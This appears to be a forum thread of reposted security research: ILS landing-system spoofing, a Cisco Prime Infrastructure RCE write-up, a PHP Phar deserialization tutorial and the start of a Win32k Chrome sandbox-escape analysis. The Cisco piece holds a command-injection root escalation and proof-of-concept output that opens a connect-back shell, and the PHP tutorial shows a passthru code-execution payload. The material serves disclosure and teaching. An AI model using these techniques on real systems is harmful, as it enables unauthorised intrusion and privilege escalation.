making it possible an attack would be shut down shortly after it started. In 2012, Researcher Brad Haines, who often goes by the handle Renderman, exposed vulnerabilities in the automatic dependent surveillance broadcast—the broadcast systems planes use to determine their location and broadcast it to others. He summed up the difficulties of real-world ILS spoofing this way: If everything lined up for this, location, concealment of gear, poor weather conditions, a suitable target, a motivated, funded and intelligent attacker, what would their result be? At absolute worst, a plane hits the grass and some injuries or fatalities are sustained, but emergency crews and plane safety design means you're unlikely to have a spectacular fire with all hands lost. At that point, airport landings are suspended, so the attacker can't repeat the attack. At best, pilot notices the misalignment, browns their shorts, pulls up and goes around and calls in a maintenance note that something is funky with the ILS and the airport starts investigating, which means the attacker is not likely wanting to stay nearby. So if all that came together, the net result seems pretty minor. Compare that to the return on investment and economic effect of one jackass with a $1,000 drone flying outside Heathrow for 2 days. Bet the drone was far more effective and certain to work than this attack. Still, the researchers said that risks exist. Planes that aren’t landing according to the glide path—the imaginary vertical path a plane follows when making a perfect landing—are much harder to detect even when visibility is good. What’s more, some high-volume airports, to keep planes moving, instruct pilots to delay making a fly-around decision even when visibility is extremely limited. The Federal Aviation Administration’s Category III approach operations, which are in effect for many US airports, call for a decision height of just 50 feet, for instance. Similar guidelines are in effect throughout Europe. Those guidelines leave a pilot with little time to safely abort a landing should a visual reference not line up with ILS readings. “Detecting and recovering from any instrument failures during crucial landing procedures is one of the toughest challenges in modern aviation,” the researchers wrote in their paper, titled Wireless Attacks on Aircraft Instrument Landing Systems, which has been accepted at the 28th USENIX Security Symposium. “Given the heavy reliance on ILS and instruments in general, malfunctions and adversarial interference can be catastrophic especially in autonomous approaches and flights.” What happens with ILS failures Several near-catastrophic landings in recent years demonstrate the danger posed from ILS failures. In 2011, Singapore Airlines flight SQ327, with 143 passengers and 15 crew aboard, unexpectedly banked to the left about 30 feet above a runway at the Munich airport in Germany. Upon landing, the Boeing 777-300 careened off the runway to the left, then veered to the right, crossed the centerline, and came to a stop with all of its landing gear in the grass to the right of the runway. The image directly below shows the aftermath. The image below that depicts the course the plane took. Enlarge / An instrument landing system malfunction caused Singapore Airlines flight SQ327 to slide off the runway shortly after landing in Munich in 2011. German Federal Bureau of Aircraft Accident Investigation Enlarge / The path Singapore Airlines flight SQ327 took after landing. An incident report published by Germany’s Federal Bureau of Aircraft Accident Investigation said that the jet missed its intended touch down point by about 1,600 feet. Investigators said one contributor to the accident was localizer signals that had been distorted by a departing aircraft. While there were no reported injuries, the event underscored the severity of ILS malfunctions. Other near-catastrophic accidents involving ILS failures are an Air New Zealand flight NZ 60 in 2000 and a Ryanair flight FR3531 in 2013. The following video helps explain what went wrong in the latter event. Animation - Stick shaker warning and Pitch-up Upsets. Vaibhav Sharma runs global operations for a Silicon Valley security company and has flown small aviation airplanes since 2006. He is also a licensed Ham Radio operator and volunteer with the Civil Air Patrol, where he is trained as a search-and-rescue flight crew and radio communications team member. He’s the pilot controlling the X-Plane flight simulator in the video demonstrating the spoofing attack that causes the plane to land to the right of the runway. Sharma told Ars: This ILS attack is realistic but the effectiveness will depend on a combination of factors including the attacker's understanding of the aviation navigation systems and conditions in the approach environment. If used appropriately, an attacker could use this technique to steer aircraft towards obstacles around the airport environment and if that was done in low visibility conditions, it would be very hard for the flight crew to identify and deal with the deviations. He said the attacks had the potential to threaten both small aircraft and large jet planes but for different reasons. Smaller planes tend to move at slower speeds than big jets. That gives pilots more time to react. Big jets, on the other hand, typically have more crew members in the cockpit to react to adverse events, and pilots typically receive more frequent and rigorous training. The most important consideration for both big and small planes, he said, is likely to be environmental conditions, such as weather at the time of landing. “The type of attack demonstrated here would probably be more effective when the pilots have to depend primarily on instruments to execute a successful landing,” Sharma said. “Such cases include night landings with reduced visibility or a combination of both in a busy airspace requiring pilots to handle much higher workloads and ultimately depending on automation.” Aanjhan Ranganathan, a Northeastern University researcher who helped develop the attack, told Ars that GPS systems provide little fallback when ILS fails. One reason: the types of runway misalignments that would be effective in a spoofing attack typically range from about 32 feet to 50 feet, since pilots or air traffic controllers will visually detect anything bigger. It’s extremely difficult for GPS to detect malicious offsets that small. A second reason is that GPS spoofing attacks are relatively easy to carry out. “I can spoof GPS in synch with this [ILS] spoofing,” Ranganathan said. “It’s a matter of how motivated the attacker is.” jump to endpage 1 of 2 An ILS primer Tests on ILS began as early as 1929, and the first fully operational system was deployed in 1932 at Germany’s Berlin Tempelhof Central Airport. ILS remains one of the most effective navigation systems for landing. Alternative approach systems such as VHF Omnidirectional Range, Non-Directional Beacon, global positioning system, and similar satellite navigation are referred to as non-precision because they provide only horizontal or lateral guidance. ILS, by contrast, is considered a precision approach system because it gives both horizontal and vertical (i.e. glide path) guidance. In recent decades, use of non-precision approach systems has decreased. ILS, meanwhile, has increasingly been folded into autopilot and autoland systems. Enlarge / An overview of ILS, showing localizer, glideslope, and marker beacons. Sathaye et al. There are two key components to ILS. A “localizer” tells a pilot if the plane is too far to the left or right of the runway centerline, while a “glideslope” indicates if the angle of descent is too big to put the plane on the ground at the start of the runway. (A third key component is known as “marker beacons.” They act as checkpoints that enable the pilot to determine the aircraft’s distance to the runway. Over the years, marker beacons have gradually been replaced with GPS and other technologies.) The localizer uses two sets of antennas that broadcast two tones—one at 90Hz and the other at 150Hz—on a frequency that’s publicly assigned to a given runway. The antenna arrays are positioned on both sides of the runway, usually beyond the departure end, in such a way that the tones cancel each other out when an approaching plane is positioned directly over the runway centerline. The course deviation indicator needle will present a vertical line that’s in the center. If the plane veers to the right, the 150Hz tone grows increasingly dominant, causing the course deviation indicator needle to move off-center. If the plane veers to the left of the centerline, the 90Hz tone grows increasingly dominant, and the needle will move to the right. While a localizer isn’t an absolute substitute for visually monitoring a plane’s alignment, it provides key, highly intuitive guidance. Pilots need only keep the needle in the center to ensure the plane is directly over the centerline. Enlarge Sathaye, et al. A glideslope works in much the same way except it provides guidance about the plane’s angle of descent relative to the start of the runway. When an approaching plane’s descent angle is too little, a 90Hz tone becomes dominant, causing instruments to indicate the plane should fly down. When the descent is too fast, a 150Hz tone indicates the plane should fly higher. When a plane stays on the prescribed glide-path angle of about three degrees, the two sounds cancel each other out. The two glide-slope antennas are mounted on a tower at specific heights defined by the glide-path angle suitable for a particular airport. The tower is usually located near the touchdown zone of the runway. Enlarge Seamless spoofing The Northeastern University researchers’ attack uses commercially available software defined radios. These devices, which cost between $400 and $600, transmit signals that impersonate the legitimate ones sent by an airport ILS. The attacker’s transmitter can be located either onboard a targeted plane or on the ground, as far as three miles from the airport. As long as the malicious signal is stronger than the legitimate one reaching the approaching aircraft, the ILS receiver will lock into the attacker signal and display attacker-controlled alignments to horizontal or vertical flight paths. Enlarge / The experiment setup. Sathaye et al. Enlarge Sathaye et al. Unless the spoofing is done carefully, there will be sudden or erratic shifts in instrument readings that would alert a pilot to an ILS malfunction. To make the spoofing harder to detect, the attacker can tap into the precise location of an approaching plane using the Automatic Dependent Surveillance–Broadcast, a system that transmits a plane’s GPS location, altitude, ground speed, and other data to ground stations and other aircraft once per second. Using this information, an attacker can start the spoofing when an approaching plane is either to the left or right of the runway and send a signal that shows the aircraft is aligned. An optimal time to initiate the attack would be shortly after the targeted plane has passed through a waypoint, as shown in the demonstration video near the beginning of this article. The attacker would then use a real-time offset correction and signal generation algorithm that continuously adjusts the malicious signal to ensure the misalignment is consistent with the actual movements of the plane. Even if attackers don’t have the sophistication to make spoofing seamless, they could still use malicious signals to create denial-of-service attacks that would prevent pilots from relying on ILS systems as they land. Enlarge / The offset correction algorithm takes into account an aircraft's real-time position to calculate the difference in the spoofed offset and the current offset. Sathaye et al. One variety of spoofing is known as an overshadow attack. It sends carefully crafted tones with a higher signal strength that overpower the ones sent by the airport ILS transmitter. A malicious radio on the ground would typically have to transmit signals of 20 watts. Overshadow attacks have the advantage of making seamless takeovers easier to do. Enlarge / An overshadow attack. Sathaye et al. A second spoofing variety, known as a single-tone attack, has the advantage of working by sending a single frequency tone at a signal strength that’s lower than the airport ILS transmitter. It comes with several disadvantages, including requiring an attacker to know specific details about a targeted plane, like where its ILS antennas are located, for the spoofing to be seamless. Enlarge / A single-tone attack. Sathaye et al. No easy fix So far, the researchers said, there are no known ways to mitigate the threat posed by spoofing attacks. Alternative navigation technologies—including high-frequency omnidirectional range, non-directional beacons, distance measurement equipment, and GPS—all use unauthenticated wireless signals and are therefore vulnerable to their own spoofing attacks. What’s more, only ILS and GPS are capable of providing both lateral and vertical approach guidance. In the paper, researchers Harshad Sathaye, Domien Schepers, Aanjhan Ranganathan, and Guevara Noubir of Northeastern University’s Khoury College of Computer Sciences went on to write: Most security issues faced by aviation technologies like ADS-B, ACARS and TCAS can be fixed by implementing cryptographic solutions. However, cryptographic solutions are not sufficient to prevent localization attacks. For example, cryptographically securing GPS signals similar to military navigation can only prevent spoofing attacks to an extent. It would still be possible for an attacker to relay the GPS signals with appropriate timing delays and succeed in a GPS location or time spoofing attack. One can derive inspiration from existing literature on mitigating GPS spoofing attacks and build similar systems that are deployed at the receiver end. An alternative is to implement a wide-area secure localization system based on distance bounding and secure proximity verification techniques [44]. However, this would require bidirectional communication and warrant further investigation with respect to scalability, deployability etc. Federal aviation administration officials said they didn't know enough about the researchers' demonstration attack to comment. The attack and the significant amount of research that went into it are impressive, but the paper leaves a key question unanswered—how likely is it that someone would expend the considerable amount of work required to carry out such an attack in the real world? Other types of vulnerabilities that, say, allow hackers to remotely install malware on computers or bypass widely used encryption protections are often easy to monetize. That’s not the case with an ILS spoofing attack. Life-threatening hacks against pacemakers and other medical devices also belong in this latter attack category. While it is harder to envision the motivation for such hacks, it would be a mistake to rule them out. A report published in March by C4ADS, a nonprofit that covers global conflict and transnational security issues, found that the Russian Federation has engaged in frequent, large-scale GPS spoofing exercises that cause ship navigation systems to show they are 65 or more miles from their true location. “The Russian Federation has a comparative advantage in the targeted use and development of GNSS spoofing capabilities,” the report warned, referring to Global Navigation Satellite Systems. “However, the low cost, commercial availability, and ease of deployment of these technologies will empower not only states, but also insurgents, terrorists, and criminals in a wide range of destabilizing state-sponsored and non-state illicit networks.” While ILS spoofing seems esoteric in 2019, it wouldn’t be a stretch to see it become more banal in the coming years, as attack techniques become better understood and software defined radios become more common. ILS attacks don’t necessarily have to be carried out with the intention of causing accidents. They could also be done with the goal of creating disruptions in much the way rogue drones closed London’s Gatwick Airport for several days last December, just days before Christmas, and then Heathrow three weeks later. “Money is one motivation, but display of power is another,” Ranganathan, the Northeastern University researcher, said. "From a defense perspective, these are very critical attacks. It’s something that needs to be taken care of because there are enough people in this world who want to display power.” Sursa: https://arstechnica.com/information-technology/2019/05/the-radio-navigation-planes-use-to-land-safely-is-insecure-and-can-be-hacked/
-
Panic! at the Cisco :: Unauthenticated Remote Code Execution in Cisco Prime Infrastructure May 17, 2019 Not all directory traversals are the same. The impact can range depending on what the traversal is used for and how much user interaction is needed. As you will find out, this simple bug class can be hard to spot in code and can have a devastating impact. Cisco patched this vulnerability as CVE-2019-1821 in Prime Infrastructure, however I am uncertain of the patch details and since I cannot test it (I don’t have access to a Cisco license), I decided to share the details here in the hope that someone else can verify its robustness. TL;DR In this post, I discuss the discovery and exploitation of CVE-2019-1821 which is an unauthenticated server side remote code execution vulnerability, just the type of bug we will cover in our training class Full Stack Web Attack. The only interaction that is required is that an admin opens a link to trigger the XSS. Introduction The Cisco website explains what Prime Infrastructure (PI) is: Cisco Prime Infrastructure has what you need to simplify and automate management tasks while taking advantage of the intelligence of your Cisco networks. Product features and capabilities help you …consolidate products, manage the network for mobile collaboration, simplify WAN management… Honestly, I still couldn’t understand what the intended use case is, so I decided to go to Wikipedia. Cisco Prime is a network management software suite consisting of different software applications by Cisco Systems. Most applications are geared towards either Enterprise or Service Provider networks. Thanks to Wikipedia, it was starting to make sense and it looks like I am not the only one confused to what this product actually does. Needless to say, that doesn’t always matter when performing security research. The Target At the time, I tested this bug on the PI-APL-3.4.0.0.348-1-K9.iso (d513031f481042092d14b77cd03cbe75) installer with the patch PI_3_4_1-1.0.27.ubf (56a2acbcf31ad7c238241f701897fcb1) applied. That patch was supposed to prevent Pedro’s bug, CVE-2018-15379. However, as we will see, a single CVE was given to two different vulnerabilities and only one of them was patched. piconsole/admin# show version Cisco Prime Infrastructure ******************************************************** Version : 3.4.0 Build : 3.4.0.0.348 Critical Fixes: PI 3.4.1 Maintenance Release ( 1.0.0 ) After performing a default install, I needed to setup high availability to reach the target code. This is standard practice when setting up a Cisco Prime Infrastructure install as stated in the documentation that I followed. It looks like a complicated process but essentially it boiled down to deploying two different PI installs and configuring one to be a primary HA server and other to be a secondary HA server. High level view of High Availability After using gigs of ram and way too much diskspace in my lab, the outcome looked like this: A correctly configured High Availability environment Additionally, I had a friend confirm the existence of this bug on version 3.5 before reporting it directly to Cisco. The Vulnerability Inside of the /opt/CSCOlumos/healthmonitor/webapps/ROOT/WEB-INF/web.xml file we find the following entry: <!-- Fileupload Servlet --> <servlet> <servlet-name>UploadServlet</servlet-name> <display-name>UploadServlet</display-name> <servlet-class> com.cisco.common.ha.fileutil.UploadServlet </servlet-class> </servlet> <servlet-mapping> <servlet-name>UploadServlet</servlet-name> <url-pattern>/servlet/UploadServlet</url-pattern> </servlet-mapping> This servlet is part of the Health Monitor application and requires a high availability server to be configured and connected. See target. Now, inside of the /opt/CSCOlumos/lib/pf/rfm-3.4.0.403.24.jar file, we can find the corresponding code for the UploadServlet class: public class UploadServlet extends HttpServlet { private static final String FILE_PREFIX = "upload_"; private static final int ONE_K = 1024; private static final int HTTP_STATUS_500 = 500; private static final int HTTP_STATUS_200 = 200; private boolean debugTar = false; public void init() {} public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { String fileName = null; long fileSize = 0L; boolean result = false; response.setContentType("text/html"); String destDir = request.getHeader("Destination-Dir"); // 1 String archiveOrigin = request.getHeader("Primary-IP"); // 2 String fileCount = request.getHeader("Filecount"); // 3 fileName = request.getHeader("Filename"); // 4 String sz = request.getHeader("Filesize"); // 5 if (sz != null) { fileSize = Long.parseLong(sz); } String compressed = request.getHeader("Compressed-Archive"); // 6 boolean archiveIsCompressed; boolean archiveIsCompressed; if (compressed.equals("true")) { archiveIsCompressed = true; } else { archiveIsCompressed = false; } AesLogImpl.getInstance().info(128, new Object[] { "Received archive=" + fileName, " size=" + fileSize + " from " + archiveOrigin + " containing " + fileCount + " files to be extracted to: " + destDir }); ServletFileUpload upload = new ServletFileUpload(); upload.setSizeMax(-1L); PropertyManager pmanager = PropertyManager.getInstance(archiveOrigin); // 7 String outDir = pmanager.getOutputDirectory(); // 8 File fOutdir = new File(outDir); if (!fOutdir.exists()) { AesLogImpl.getInstance().info(128, new Object[] { "UploadServlet: Output directory for archives " + outDir + " does not exist. Continuing..." }); } String debugset = pmanager.getProperty("DEBUG"); if ((debugset != null) && (debugset.equals("true"))) { this.debugTar = true; AesLogImpl.getInstance().info(128, new Object[] { "UploadServlet: Debug setting is specified" }); } try { FileItemIterator iter = upload.getItemIterator(request); while (iter.hasNext()) { FileItemStream item = iter.next(); String name = item.getFieldName(); InputStream stream = item.openStream(); // 9 if (item.isFormField()) { AesLogImpl.getInstance().error(128, new Object[] { "Form field input stream with name " + name + " detected. Abort processing" }); response.sendError(500, "Servlet does not handle FormField uploads."); return; } // 10 result = processFileUploadStream(item, stream, destDir, archiveOrigin, archiveIsCompressed, fileName, fileSize, outDir); stream.close(); } } At [1], [2], [3], [4], [5] and [6], the code gets 6 input parameters from an attacker controlled request. They are the destDir, archiveOrigin, fileCount, fileName, fileSize (which is a long value) and compressed (which is a boolean). Then at [7] we need to supply a correct Primary-IP so that we get a valid outDir at [8]. Then at [9] the code actually gets stream input from a file upload and then at [10] the code calls processFileUploadStream with the first 7 of the 8 parameters to the method. private boolean processFileUploadStream(FileItemStream item, InputStream istream, String destDir, String archiveOrigin, boolean archiveIsCompressed, String archiveName, long sizeInBytes, String outputDir) throws IOException { boolean result = false; try { FileExtractor extractor = new FileExtractor(); // 11 AesLogImpl.getInstance().info(128, new Object[] { "processFileUploadStream: Start extracting archive = " + archiveName + " size= " + sizeInBytes }); extractor.setDebug(this.debugTar); result = extractor.extractArchive(istream, destDir, archiveOrigin, archiveIsCompressed); // 12 Then the code at [11] creates a new FileExtractor and then at [12] the code calls extractArchive with attacker controlled paramaters istream, destDir, archiveOrigin and archiveIsCompressed. public class FileExtractor { ... public boolean extractArchive(InputStream ifstream, String destDirToken, String sourceIPAddr, boolean compressed) { if (ifstream == null) { throw new IllegalArgumentException("Tar input stream not specified"); } String destDir = getDestinationDirectory(sourceIPAddr, destDirToken); // 13 if ((destDirToken == null) || (destDir == null)) { throw new IllegalArgumentException("Destination directory token " + destDirToken + " or destination dir=" + destDir + " for extraction of tar file not found"); } FileArchiver archiver = new FileArchiver(); boolean result = archiver.extractArchive(compressed, null, ifstream, destDir); // 14 return result; } At [13] the code calls getDestinationDirectory with our controlled sourceIPAddr and destDirToken. The destDirToken needs to be a valid directory token, so I used the tftpRoot string. Below is an abtraction taken from the HighAvailabilityServerInstanceConfig class. if (name.equalsIgnoreCase("tftpRoot")) { return getTftpRoot(); } At this point, we reach [14] which calls extractArchive with our parameters compressed, ifstream and destDir. public class FileArchiver { ... public boolean extractArchive(boolean compress, String archveName, InputStream istream, String userDir) { this.archiveName = archveName; this.compressed = compress; File destDir = new File(userDir); if (istream != null) { AesLogImpl.getInstance().trace1(128, "Extract archive from stream to directory " + userDir); } else { AesLogImpl.getInstance().trace1(128, "Extract archive " + this.archiveName + " to directory " + userDir); } if ((!destDir.exists()) && (!destDir.mkdirs())) { destDir = null; AesLogImpl.getInstance().error1(128, "Error while creating destination dir=" + userDir + " Giving up extraction of archive " + this.archiveName); return false; } result = false; if (destDir != null) { try { setupReadArchive(istream); // 15 this.archive.extractContents(destDir); // 17 return true; } The code first calls setupReadArchive at [15]. This is important, because we set the archive variable to be an instance of the TarArchive class at [16] in the below code. private boolean setupReadArchive(InputStream istream) throws IOException { if ((this.archiveName != null) && (istream == null)) { try { this.inStream = new FileInputStream(this.archiveName); } catch (IOException ex) { this.inStream = null; return false; } } else { this.inStream = istream; } if (this.inStream != null) { if (this.compressed) { try { this.inStream = new GZIPInputStream(this.inStream); } catch (IOException ex) { this.inStream = null; } if (this.inStream != null) { this.archive = new TarArchive(this.inStream, 10240); // 16 } } else { this.archive = new TarArchive(this.inStream, 10240); } } if (this.archive != null) { this.archive.setDebug(this.debug); } return this.archive != null; } Then at [17] the code calls extractContents on the TarArchive class. extractContents( File destDir ) throws IOException, InvalidHeaderException { for ( ; ; ) { TarEntry entry = this.tarIn.getNextEntry(); if ( entry == null ) { if ( this.debug ) { System.err.println( "READ EOF RECORD" ); } break; } this.extractEntry( destDir, entry ); // 18 } } At [18] the entry is extracted and finally we can see the line responsible for blindly extracting tar archives without checking for directory traversals. try { boolean asciiTrans = false; FileOutputStream out = new FileOutputStream( destFile ); // 19 ... for ( ; ; ) { int numRead = this.tarIn.read( rdbuf ); if ( numRead == -1 ) break; if ( asciiTrans ) { for ( int off = 0, b = 0 ; b < numRead ; ++b ) { if ( rdbuf[ b ] == 10 ) { String s = new String ( rdbuf, off, (b - off) ); outw.println( s ); off = b + 1; } } } else { out.write( rdbuf, 0, numRead ); // 20 } } At [19] the file is created and then finally at [20] the contents of the file is writen to disk. It’s interesting to note that the vulnerable class is actually third party code written by Timothy Gerard Endres at ICE Engineering. It’s even more interesting that other projects such as radare also uses this vulnerable code! The impact of this vulnerability is that it can allow an unauthenticated attacker to achieve remote code execution as the prime user. Bonus Since Cisco didn’t patch CVE-2018-15379 completely, I was able to escalate my access to root: python -c 'import pty; pty.spawn("/bin/bash")' [prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' sh-4.1# /usr/bin/id /usr/bin/id uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0 But wait, there is more! Another remote code execution vulnerability also exists in the source code of TarArchive.java. Can you spot it? ? Proof of Concept saturn:~ mr_me$ ./poc.py (+) usage: ./poc.py <target> <connectback:port> (+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444 saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444 (+) planted backdoor! (+) starting handler on port 4444 (+) connection from 192.168.100.123 (+) pop thy shell! python -c 'import pty; pty.spawn("/bin/bash")' [prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' sh-4.1# /usr/bin/id /usr/bin/id uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0 You can download the full exploit here. Thanks A special shoutout goes to Omar Santos and Ron Taylor of Cisco PSIRT for communicating very effectively during the process of reporting the vulnerabilities. Conclusion This vulnerability survived multiple code audits by security researchers and I believe that’s because it was triggered in a component that was only reachable after configuring high availability. Sometimes it takes extra effort from the security researchers point of view to configure lab environments correctly. Finally, if you would like to learn how to perform in depth attacks like these then feel free to sign up to my training course Full Stack Web Attack in early October this year. References https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt Sursa: https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
-
Reverse Engineering 101 11 sections. This workshop provides the fundamentals of reversing engineering Windows malware using a hands-on experience with RE tools and techniques. x86 Published May 14, 2019 Reverse Engineering 102 18 sections. This workshop build on RE101 and focuses on identifying simple encryption routines, evasion techniques, and packing. x86packingencryptionevasion Published May 17, 2019 Setting Up Your Analysis Environment In this workshop, you will learn the basics of setting up a simple malware analysis environment. ETA May 30, 2019 Sursa: https://malwareunicorn.org/#/workshops
-
Exploiting PHP Phar Deserialization Vulnerabilities - Part 1 May 17, 2019 by Daniel Timofte Understanding the Inner-Workings INTRODUCTION Phar deserialization is a relatively new vector for performing code reuse attacks on object-oriented PHP applications and it was publicly disclosed at Black Hat 2018 by security researcher Sam Thomas. Similar to ROP (return-oriented programming) attacks on compiled binaries, this type of exploitaton is carried through PHP object injection (POI), a form of property-oriented programming (POP) in the context of object-oriented PHP code. Due to its novelty, this kind of attack vector gained increased attention from the security community in the past few months, leading to the discovery of remote code execution vulnerabilities in many widely deployed platforms, such as: Wordpress < 5.0.1 (CVE-2018-20148) Drupal 8.6.x, 8.5.x, 7.x (CVE-2019-6339) Prestashop 1.6.x, 1.7.x (CVE-2018-19126) TCPDF < 6.2.19 (CVE-2018-17057) PhpBB 3.2.3 (CVE-2018-19274) Throughout this series, we aim to describe Phar deserialization’s inner workings, with a hands-on approach to exploit PhpBB 3.2.3, a remote code execution vulnerability in the PhpBB platform. ON PHAR FILES, DESERIALIZATION, AND PHP WRAPPERS To better understand how this vector works, we need a bit of a context regarding what Phar files are, how deserialization attacks work, what a PHP wrapper is, and how the three concepts interrelate. What is a Phar File? Phar (PHp ARchive) files are a means to distribute PHP applications and libraries by using a single file format (similar to how JAR files work in the Java ecosystem). These Phar files can also be included directly in your own PHP code. Structurally, they’re simply archives (tar files with optional gzip compression or zip-based ones) with specific parts described by the PHP manual as follows: A stub – which is a PHP code sequence acting as a bootstrapper when the Phar is being run as a standalone application; as a minimum, it must contain the following code: <?php __HALT_COMPILER(); A manifest describing a source file included in the archive; optionally, holds serialized meta-data (this serialized chunk is a critical link in the exploitation chain as we will see further on) A source file (the actual Phar functionality) An optional signature, used for integrity checks Understanding deserialization vulnerabilities Serialization is the process of storing an object’s properties in a binary format, which allows it to be passed around or stored on a disk, so it can be unserialized and used at a later time. In PHP, the serialization process only saves an object’s properties, its class name, but not its methods (hence the POP acronym). This proves to be a smart design choice from a security perspective, except there’s one particularity that makes the deserialization process dangerous: the so-called magic methods. These functions are specific to every PHP class, have a double-underscore prefixed name and get implicitly called on certain runtime events. By default, most of them do nothing and it’s the developer’s job to define their behavior. In our case, the following two are worth mentioning, since they’re the only ones that get triggered on Phar deserialization: __wakeup() – called implicilty upon an object’s deserialization __destruct() – called implicitly when an object is not used anymore in the code and gets destroyed by the garbage collector Let’s look at how a snippet of vulnerable code is exploited using this vector on the following dummy example: # file: dummy_class.php <?php /* Let's suppose some serialized data is written on the disk with loose file permissions and gets read at a later time */ class Data { # Some default data public $data = array("theme"=>"light", "font"=>12); public $wake_func = "print_r"; public $wake_args = "The data has been read!\n"; # magic method that is called on deserialization public function __wakeup() { call_user_func($this->wake_func, $this->wake_args); } } # acting as main the conditional below gets executed only when file is called directly if (basename($argv[0]) == basename(__FILE__)) { # Serialize the object and dump it to the disk; also free memory $data_obj = new Data(); $fpath = "/tmp/777_file"; file_put_contents($fpath, serialize($data_obj)); echo "The data has been written.\n"; unset($data_obj); # Wait for 60 seconds, then retrieve it echo "(sleeping for 60 seconds…)\n"; sleep(60); $new_obj = unserialize(file_get_contents($fpath)); } We notice that, upon deserialization, the __wake method dynamically calls the print_r function pointed by the object’s $wake_func and $wake_args properties. A simple run yields the following output: $ php dummy_class.php The data has been written. (sleeping for 60 seconds…) The data has been read! But what if, in the 60-second timespan, we manage to replace the serialized data with our own to get control of the function called upon in deserialization? The following code describes how to accomplish this: # file: exploit.php <?php require('dummy_class.php'); # Using the existing class definition, we create a crafted object and overwrite the # existing serialized data with our own $bad_obj = new Data(); $bad_obj->wake_func = "passthru"; $bad_obj->wake_args = "id"; $fpath = "/tmp/777_file"; file_put_contents($fpath, serialize($bad_obj)); Running the above snippet in the 60-second timespan, while dummy_class.php is waiting, grants us a nice code execution, even though the source of dummy_class.php hasn’t changed. The behavior results from the serialized object’s dynamic function call, changed through the object’s properties to passthru("id"). $ php dummy_class.php The data has been written. (sleeping for 60 seconds…) uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd) In the context of PHP object injection (POI/deserialization) attacks, these vulnerable sequences of code bear the name of gadgets or POP chains. PHP Wrappers – Wrapping it Together According to the PHP documentation, streams are the way of generalizing file, network, data compression, and other operations that share a common set of functions and uses. PHP wrappers take the daunting task of handling various protocols and providing a stream interface with the protocol’s data. These streams are usually used by filesystem functions such as fopen(), copy(), and filesize(). A stream is accessed using a URL-like syntax scheme: wrapper://source. The most usual stream interfaces provided by PHP are: file:// - Accessing local filesystem http:// - Accessing HTTP(s) URLs ftp:// - Accessing FTP(s) URLs php:// - Accessing various I/O streams The stream type of interest to us is (*drum roll*) the phar:// wrapper. A typical declaration has the form of phar://full/or/relative/path, and has two interesting properties: Its file extension doesn’t get checked when declaring a stream, making phar files veritable polyglot candidates If a filesystem function is called with a phar stream as an argument, the Phar’s serialized metadata automatically gets unserialized, by design Here is a list of filesystem functions that trigger phar deserialization: copy file_exists file_get_contents file_put_contents file fileatime filectime filegroup fileinode filemtime fileowner fileperms filesize filetype fopen is_dir is_executable is_file is_link is_readable is_writable lstat mkdir parse_ini_file readfile rename rmdir stat touch unlink How to Carry Out a Phar Deserialization Attack At this point, we have all the ingredients for a recipe for exploitation. The required conditions for exploiting a Phar deserialization vulnerability usually consist of: The presence of a gadget/POP chain in an application’s source code (including third-party libraries), which allows for POI exploitation; most of the time, these are discovered by source code inspection The ability to include a local or remote malicious Phar file (most commonly, by file upload and relying on ployglots) An entry point, where a filesystem function gets called on a user-controlled phar wrapper, also discovered by source code inspection For example, think of a poorly sanitized input field for setting a profile picture via an URL. The attacker sets the value of the input to the previously uploaded Phar/polyglot, rather than a http:// address (say phar://../uploads/phar_polyglot.jpg); on server-side, the backend performs a filesystem call on the provided wrapper, such as verifying if the file exists on the disk by calling file_exists("phar://../uploads/phar_polyglot.jpg"). At this very moment, the uploaded Phar’s metadata is unserialized, taking advantage of the gadgets/POP chains to complete the exploitation chain. Look for part two of this blog series, where we’ll see how all of these concepts apply by getting our hands dirty and exploiting a remote code execution in PhpBB 3.2.3 (CVE-2018-19274). Sursa: https://www.ixiacom.com/company/blog/exploiting-php-phar-deserialization-vulnerabilities-part-1
-
Standard Posted by Exodus Intel VRT Posted on May 17, 2019 Posted under Uncategorized Windows Within Windows – Escaping The Chrome Sandbox With a Win32k NDay Author: Grant Willcox This post explores a recently patched Win32k vulnerability (CVE-2019-0808) that was used in the wild with CVE-2019-5786 to provide a full Google Chrome sandbox escape chain. Overview On March 7th 2019, Google came out with a blog post discussing two vulnerabilities that were being chained together in the wild to remotely exploit Chrome users running Windows 7 x86: CVE-2019-5786, a bug in the Chrome renderer that has been detailed in our blog post, and CVE-2019-0808, a NULL pointer dereference bug in win32k.sys affecting Windows 7 and Windows Server 2008 which allowed attackers escape the Chrome sandbox and execute arbitrary code as the SYSTEM user. Since Google’s blog post, there has been one crash PoC exploit for Windows 7 x86 posted to GitHub by ze0r, which results in a BSOD. This blog details a working sandbox escape and a demonstration of the full exploit chain in action, which utilizes these two bugs to illustrate the APT attack encountered by Google in the wild. Analysis of the Public PoC To provide appropriate context for the rest of this blog, this blog will first start with an analysis of the public PoC code. The first operation conducted within the PoC code is the creation of two modeless drag-and-drop popup menus, hMenuRoot and hMenuSub. hMenuRoot will then be set up as the primary drop down menu, and hMenuSub will be configured as its submenu. HMENU hMenuRoot = CreatePopupMenu(); HMENU hMenuSub = CreatePopupMenu(); ... MENUINFO mi = { 0 }; mi.cbSize = sizeof(MENUINFO); mi.fMask = MIM_STYLE; mi.dwStyle = MNS_MODELESS | MNS_DRAGDROP; SetMenuInfo(hMenuRoot, &mi); SetMenuInfo(hMenuSub, &mi); AppendMenuA(hMenuRoot, MF_BYPOSITION | MF_POPUP, (UINT_PTR)hMenuSub, "Root"); AppendMenuA(hMenuSub, MF_BYPOSITION | MF_POPUP, 0, "Sub"); Following this, a WH_CALLWNDPROC hook is installed on the current thread using SetWindowsHookEx(). This hook will ensure that WindowHookProc() is executed prior to a window procedure being executed. Once 